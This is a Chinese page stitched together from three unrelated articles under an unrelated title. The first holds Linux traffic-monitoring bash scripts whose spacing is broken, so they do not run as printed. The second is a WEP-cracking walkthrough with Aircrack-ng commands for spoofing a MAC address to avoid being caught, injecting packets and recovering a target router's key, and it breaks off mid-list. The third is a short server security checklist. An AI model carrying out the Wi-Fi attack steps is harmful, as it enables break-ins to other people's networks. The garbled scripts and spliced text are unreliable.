linux发包 linux软件安装包格式
如何在Linux下统计高速网络中的流量
Linux下统计高速网络流量方法如下:
在Linux中有很多的流量监控工具,它们可以监控、分类网络流量,以花哨的图形用户界面提供实时流量分析报告。大多数这些工具(例如:ntopng,iftop)都是基于libpcap库的,这个函数库是用来截取流经网卡的数据包的,可在用户空间用来监视分析网络流量。尽管这些工具功能齐全,然而基于libpcap库的流量监控工具无法处理高速(Gb以上)的网络接口,原因是由于在用户空间做数据包截取的系统开销过高所致。
在本文中我们介绍一种简单的Shell脚本,它可以监控网络流量而且不依赖于缓慢的libpcap库。这些脚本支持Gb以上规模的高速网络接口,如果你对“汇聚型”的网络流量感兴趣的话,它们可统计每个网络接口上的流量。
脚本主要是基于sysfs虚拟文件系统,这是由内核用来将设备或驱动相关的信息输出到用户空间的一种机制。网络接口的相关分析数据会通过“/sys/class/net/<ethX>/statistics”输出。
举个例子,eth0的网口上分析报告会输出到这些文件中:
/sys/class/net/eth0/statistics/rx_packets:收到的数据包数据
/sys/class/net/eth0/statistics/tx_packets:传输的数据包数量
/sys/class/net/eth0/statistics/rx_bytes:接收的字节数
/sys/class/net/eth0/statistics/tx_bytes:传输的字节数
/sys/class/net/eth0/statistics/rx_dropped:收包时丢弃的数据包
/sys/class/net/eth0/statistics/tx_dropped:发包时丢弃的数据包
这些数据会根据内核数据发生变更的时候自动刷新。因此,你可以编写一系列的脚本进行分析并计算流量统计。下面就是这样的脚本(感谢 joemiller提供)。第一个脚本是统计每秒数据量,包含接收(RX)或发送(TX)。而后面的则是一个描述网络传输中的接收(RX)发送(TX)带宽。这些脚本中安装不需要任何的工具。
测量网口每秒数据包:
#!/bin/bash
INTERVAL="1"#update interval in seconds
if [-z"$1" ]; then
echo
echousage:$0 [network-interface]
echo
echoe.g.$0 eth0
echo
echoshows packets-per-second
exit
fi
IF=$1
while true
do
R1=`cat/sys/class/net/$1/statistics/rx_packets`
T1=`cat/sys/class/net/$1/statistics/tx_packets`
sleep$INTERVAL
R2=`cat/sys/class/net/$1/statistics/rx_packets`
T2=`cat/sys/class/net/$1/statistics/tx_packets`
TXPPS=`expr$T2-$T1`
RXPPS=`expr$R2-$R1`
echo"TX$1:$TXPPS pkts/s RX$1:$RXPPS pkts/s"
done
网络带宽测量
#!/bin/bash
INTERVAL="1"#update interval in seconds
if [-z"$1" ]; then
echo
echousage:$0 [network-interface]
echo
echoe.g.$0 eth0
echo
exit
fi
IF=$1
while true
do
R1=`cat/sys/class/net/$1/statistics/rx_bytes`
T1=`cat/sys/class/net/$1/statistics/tx_bytes`
sleep$INTERVAL
R2=`cat/sys/class/net/$1/statistics/rx_bytes`
T2=`cat/sys/class/net/$1/statistics/tx_bytes`
TBPS=`expr$T2-$T1`
RBPS=`expr$R2-$R1`
TKBPS=`expr$TBPS/ 1024`
RKBPS=`expr$RBPS/ 1024`
echo"TX$1:$TKBPS kb/s RX$1:$RKBPS kb/s"
done
下面的屏幕截图显示了上面的两个脚本的输出。
airodump-ng linux下怎样抓包
Aircrack-ng系列工具也有Windows平台版本,但是本人的小黑的始终不能在win下抓包,所以只能弃 Windows从Linux了,另外 Windows下扫描到的 AP也比 Linux下少了很多。其实 Windows并不完整的支持 TCP/IP协议族,有些协议Windows直接丢弃不用。网络本来从一开始就是 Unix的天下,Windows只是在后来加入了网络的功能。
Aircrack-ng工具包有很多工具,我用到的工具主要有以下几个:
airmon-ng处理网卡工作模式
airodump-ng抓包
aircrack-ng破解
aireplay-ng发包,干扰
另外还要用到以下 linux命令:
ifconfig查看修改网卡状态和参数
macchanger伪造 MAC
iwconfig主要针对无线网卡的工具(同 ifconfig)
iwlist获取无线网络的更详细信息
另外还有其他的 linux基本命令,我就不提示了。
具体破解步骤:
1.修改无线网卡状态:先 dow
2.伪造无线网卡的 MAC地址:安全起见,减少被抓到的可能
3.修改网卡工作模式:进入Monitor状态,会产生一个虚拟的网卡
4.修改无线网卡状态: up
5.查看网络状态,记录下 AP的 MAC和本机的 MAC,确定攻击目标
6.监听抓包:生成.cap或.ivs
7.干扰无线网络:截取无线数据包,发送垃圾数据包,用来获得更多的有效数据包
8.破解.cap或.ivs,获得 WEP密码,完成破解
Crack Mode一共有5种请酌情使用还有网卡不一定是ath1也有可能是wifi0,ath0等等
ifconfig-a
ifconfig-a ath0 up
airmon-ng start wifi0 6
airodump-ng--ivs-w目标路由器IVS文件-c 6 ath1
airodump-ng ath1
aireplay-ng-1 0-e目标路由器SSID-a目标MAC-h本机MAC ath1
------------2 Crack Mode-----------
aireplay-ng-2-p 0841-c ffffffffffff-b目标MAC-h本机MAC ath1
------------3 Crack Mode-----------
aireplay-ng-3-b目标MAC-h本机MAC ath1
------------4 Crack Mode-----------
aireplay-ng-4-b目标MAC-h本机MAC ath1
packetforge-ng-0-a目标MAC-h本机MAC-k 255.255.255.255-l 255.255.255.255-y.xor-w MyArp
aireplay-ng-2-r MyArp-x 256 ath1
------------5 Crack Mode-----------
aireplay-ng-5-b目标MAC-h本机MAC ath1
packetforge-ng-0-a目标MAC-h本机MAC-k 255.255.255.255-l 255.255.255.255-y.xor-w MyArp
aireplay-ng-2-r MyArp-x 256 ath1
-----------Crack Key-----------
aircrack-ng-n 64-b目标MAC目标路由器IVS文件-01.ivs
——————————————————————————————
下面详细介绍一下各个命令的基本用法(参照命令的英文说明)
1. ifconfig
用来配置网卡,我们这里主要用来禁用和启用网卡:
ifconfig ath0 down
ifconfig ath0 up
禁用一下网卡的目的是为了下一步修改 MAC。
2.macchanger
用来改变网卡的 MAC地址,具体用法如下:
usage: macchanger [options] device
-h显示帮助
-V显示版本
-s显示当前MAC
-e不改变mac,使用硬件厂商写入的MAC
-a自动生成一个同类型的MAC,同厂商的
-A自动生成一个不同类型的MAC,不同厂商的
-r生成任意MAC
-l显示已知厂商的网卡MAC地址分配,这个很有用,可以根据MAC查出来是哪个厂商生产的产品
-m设置一个自定义的MAC如: macchanger--mac=00:34:00:00:00:00 ath0。
3.airmon-ng
启动无线网卡进入 Monitor模式,
useage: airmon-ng<start|stop|check><interface> [channel]
<start|stop|check>启动,停止,检测
<interface>指定无线网卡
[channel]监听频道,现代大多数无线路由默认是 6,随便扫描一下都是这个频道,网管们应该换换了
4.iwconfig
专用的无线网卡配置工具,用来配置特殊的网络信息,不带参数时显示可用网络。
useage:iwconfig interface [options]
[essid{NN|ON|OFF}]指定essid号开启关闭
[nwid{NN|on|off}]指定网络id号开启关闭
[mode{managed|ad-hoc|....}]指定无线网络工作模式/类型
[freq N.NNNN[K|M|G]]指定工作频率
[channel N]指定频道
[ap{N|off|auto}]指定AP号关闭/自动
[sens N] sens号
[nick N] nick号
[rate{N|auto|fixed}]速率控制
[rts{N|auto|fixed|off}] rts控制,如果不知道什么是RTS,那就回去好好去学网络,不用往下看了
[frag{N|auto|fixed|off}]碎片控制
[enc{NNNN-NNNN|off}]范围
[power{period N|timeout N}]电源频率/超时
[retry{limit N|lifetime N}]重试限次/超时
[txpower N{mw|dBm}]功率毫瓦/分贝
[commit]处理
5.iwlist
主要用来显示无线网卡的一些附加信息,同上
useage: iwlist [interface] options
scanning扫描
frequency频率
channel频道
bitrate速率
rate速率
encryption加密
key密钥
power电源
txpower功率
ap ap
accespoints ap
peers直连
event事件
6.airodump-ng
抓包工具,我最喜欢用的,详细用法如下:
usage: airodump-ng<options><interface>[,<interface>,...]
Options:
--ivs:仅将抓取信息保存为.ivs
--gpsd:使用 GPSd
--write<prefix>:保存为指定日文件名,我一般用这个,尤其是多个网络时,指定了也好区分
-w:同--write
--beacons:保存所有的 beacons,默认情况况下是丢弃那些无用的数据包的
--update<secs>:显示更新延迟,没有用过
--showack:显示ack/cts/rts状态,还是那句,不知道rts就不用看了
-h:隐藏已知的,配合上面的选项使用
-f<msecs>:跳频时间
--berlin<secs>:无数据包接收时延迟显示的时间,这句不太好翻译,意思是当那个信号发出设备没有发出数据包多少时间之后,就停止对它的监视.默认120秒.建议学好英文去读原文,翻译的都会有出入,这是我的理解.(mhy_mhy注)
-r<file>:从指定的文件读取数据包.我也想有人给我抓好包放哪里,呵呵
Filter options:
--encrypt<suite>:使用密码序列过滤 AP
--netmask<netmask>:使用掩码过滤 AP
--bssid<bssid>:使用 bssid过滤 AP
-a:过滤无关的客户端
默认情况下使用2.4Ghz,你也可以指定其他的频率,通过以下命令操作:
--channel<channels>:指定频道
--band<abg>:制定带宽
-C<frequencies>:指定频率MHz
--cswitch<method>:设置频道交换方式
0: FIFO(default)先进先出(默认)
1: Round Robin循环
2: Hop on last最后一跳
-s:同上
--help:显示使用方法,翻译到这里,感觉还是英文的贴切一点,建议读原文
7.aireplay-ng
如何排查Linux服务器上的恶意发包行为
某些病毒程序会向Linux服务器恶意发包,极大地占用服务器的带宽,导致服务器的访问速度变慢。
一:病毒木马排查。
1、使用netstat查看网络连接,分析是否有可疑发送行为,如有则停止。
2、使用杀毒软件进行病毒查杀。
二:服务器漏洞排查并修复。
1、查看服务器账号是否有异常,如有则停止删除掉。
2、查看服务器是否有异地登录情况,如有则修改密码为强密码(字每+数字+特殊符号)大小写,10位及以上。
3、查看Jenkins、Tomcat、PhpMyadmin、WDCP、Weblogic后台密码,提高密码强度(字每+数字+特殊符号)大小写,10位及以上。
4、查看WEB应用是否有漏洞,如struts, ElasticSearch等,如有则请升级。
5、查看MySQL、SQLServer、FTP、WEB管理后台等其它有设置密码的地方,提高密码强度(字每+数字+特殊符号)大小写,10位及以上。
6、查看Redis无密码可远程写入文件漏洞,检查/root/.ssh/下黑客创建的SSH登录密钥文件,删除掉,修改Redis为有密码访问并使用强密码,不需要公网访问最好bind 127.0.0.1本地访问。
7、如果有安装第三方软件,请按官网指引进行修复。
